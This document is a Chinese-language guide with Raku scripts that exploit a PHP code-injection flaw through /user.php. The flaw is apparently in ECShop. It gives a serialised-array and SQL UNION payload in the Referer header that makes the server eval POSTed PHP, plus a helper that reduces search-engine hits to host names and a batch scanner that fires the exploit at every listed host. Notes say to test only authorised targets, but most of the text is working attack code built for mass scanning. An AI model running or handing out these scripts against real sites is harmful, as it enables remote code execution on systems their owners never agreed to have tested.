下面为测试是否存在漏洞的脚本（Perl 6 / Raku 脚本，需要安装 HTTP::UserAgent 模块；它向 <url>/user.php 发送一个带有特制 Referer 头、POST 参数为 action=login&vulnspy=phpinfo();exit; 的请求）:
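# Single-target check: send the crafted request to <url>/user.php and print
# "True" when the response body looks like phpinfo() output.
#
# How the probe works (all of this is visible in the payload below):
#   * the Referer header carries a PHP-serialised array whose "num" field is a
#     SQL UNION; the hex literal selected by it decodes to PHP that eval()s a
#     base64 string which is itself `eval($_POST[vulnspy]);`
#   * the POST body sets `vulnspy=phpinfo();exit;`
# so a vulnerable host executes phpinfo() and returns its output.
#
# NOTE(review): only run this against hosts you are authorised to test.
sub MAIN($url) {
    use HTTP::UserAgent;

    my $ua = HTTP::UserAgent.new;
    $ua.timeout = 10;                       # seconds; don't hang on a dead host

    my $req = HTTP::Request.new;
    $req.uri: $url ~ '/user.php';
    $req.set-method: 'POST';
    $req.add-content("action=login&vulnspy=phpinfo();exit;");

    # Serialised-array / SQL-injection payload. The s:N byte counts are part of
    # the serialised format, so the string must stay byte-for-byte as is.
    my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';
    $req.header.field(Referer => $exp);
    # The original wrote `:Content-Type`, which is `Content-Type => True` and
    # sends "Content-Type: True". PHP only populates $_POST for a form content
    # type, so state it explicitly.
    $req.header.field(Content-Type => 'application/x-www-form-urlencoded');

    my $resp = $ua.request($req);
    # Any "phpinfo" in the body counts as a hit. A page that merely mentions
    # the word is a false positive, so confirm a "True" by hand.
    if $resp.content ~~ /:i phpinfo/ {
        say 'True';
    }
}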
输出为 True 时表示响应正文中出现了 phpinfo 字样，即注入的 PHP 代码已被执行，存在漏洞。若目标页面本身就包含 phpinfo 字样会产生误报，建议人工复核。
关键字查找可以用这个脚本（原文此处未附上脚本）:
查找结果后处理 URL 可以用如下脚本（从 1.txt 逐行读取，只保留协议和主机名部分，追加写入 url.txt）:
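# Post-process a list of search hits: read 1.txt line by line, reduce each
# entry to its host part (scheme + host for an absolute URL, everything before
# the first '/' otherwise), print it and append it to url.txt.

# Return the host part of one search-hit line.
#   "example.com"            -> "example.com"        (no path: unchanged)
#   "http://example.com/x/y" -> "http://example.com"
#   "https://a.b.c/"         -> "https://a.b.c"
#   "example.com/shop/"      -> "example.com"
sub host-part(Str $line --> Str) {
    # No slash at all: nothing to strip.
    return $line unless $line.contains('/');

    # Absolute URL: keep "http(s)://host". The original pattern used a greedy
    # `.*` in front of '//', so a path containing '//' could be swallowed into
    # the "host", and "http://host" with no trailing slash yielded an empty
    # string because the pattern required a '/' after the host.
    if $line ~~ /^ ( 'http' 's'? '://' <-[/]>* ) / {
        return ~$0;
    }

    # Bare host followed by a path: keep everything before the first '/'.
    return $line.substr(0, $line.index('/'));
}

my $hits = open '1.txt', :r;
my $out  = open 'url.txt', :a;
for $hits.lines -> $line {
    my $host = host-part($line);
    say $host;
    $out.say($host);
}
# Close explicitly so the appended lines are flushed before the script ends.
$out.close;
$hits.close;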
把以上处理过的文本（url.txt，每行一个目标，可带或不带 http:// 前缀）导入进行批量检测，最终脚本为:
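# Batch check: read one target per line from url.txt (with or without an
# "http://" prefix), send the probe to <target>/user.php and print
# "Hack!!! " / "No" / "Error: ..." for each host.
#
# NOTE(review): only run this against hosts you are authorised to test.
use HTTP::UserAgent;

# Send the probe to $url/user.php and print the verdict. $url is the base URL
# (scheme + host); "/user.php" is appended here, so callers must not add it
# themselves.
sub TEST($url) {
    my $ua = HTTP::UserAgent.new;
    $ua.timeout = 10;                       # seconds; a dead host ends up in CATCH

    my $req = HTTP::Request.new;
    $req.uri: $url ~ '/user.php';
    $req.set-method: 'POST';
    $req.add-content("action=login&vulnspy=phpinfo();exit;");

    # Serialised-array / SQL-injection payload carried in Referer. The s:N
    # byte counts are part of the serialised format: keep it byte-for-byte.
    my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';
    $req.header.field(Referer => $exp);
    # `:Content-Type` is `Content-Type => True` and would send
    # "Content-Type: True"; PHP only fills $_POST for a form content type.
    $req.header.field(Content-Type => 'application/x-www-form-urlencoded');

    try {
        my $resp = $ua.request($req);
        # Any "phpinfo" in the body counts as a hit; a page that merely
        # mentions the word is a false positive, so confirm by hand.
        if $resp.content ~~ /:i phpinfo/ {
            say 'Hack!!! ';
        }
        else {
            say 'No';
        }
        CATCH {
            # Network errors, timeouts, malformed responses etc. land here.
            # Printing the message tells a timeout apart from a refused
            # connection or an unresolvable host.
            default { say 'Error: ' ~ .message; }
        }
    }
}

my $targets = open 'url.txt', :r;
for $targets.lines -> $line {
    my $url = $line.trim;
    next unless $url;                       # skip blank lines ("http:///user.php")

    # Lines without a scheme are treated as plain http:// hosts.
    my $base = $url ~~ /^http/ ?? $url !! 'http://' ~ $url;
    say 'Check url: ' ~ $base ~ '/user.php';

    # Pass the base URL only: the original handed "$base/user.php" to TEST,
    # which appended another "/user.php", so the real request went to
    # /user.php/user.php.
    TEST($base);
}
$targets.close;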
注意:
当打印结果为 Error 时, 可能是请求出错（例如超过脚本设定的 10 秒超时）, 或者是 url 链接无法打开。如果有这种情况请进行手工测试。另外，批量检测只应针对已获得授权的目标进行。
漏洞说明链接为: